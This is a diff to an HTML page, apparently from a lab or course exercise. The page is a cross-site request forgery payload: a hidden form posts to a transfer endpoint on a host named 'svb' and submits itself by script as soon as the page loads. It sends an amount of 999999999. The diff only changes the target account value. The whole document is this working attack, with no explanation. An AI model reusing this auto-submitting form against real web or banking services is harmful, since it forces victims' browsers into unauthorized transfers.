--- a/H2.html
+++ b/H2.html
@@ -1,7 +1,7 @@
 <html>
 <body>
 <form id=form1 action="http://svb:5003/transfer/1" method="post">
-<input type="hidden" name="account" value="lukkes" />
+<input type="hidden" name="account" value="191" />
 <input type="hidden" name="amount" value="999999999" />
 </form>
 <script>document.getElementById('form1').submit()</script>
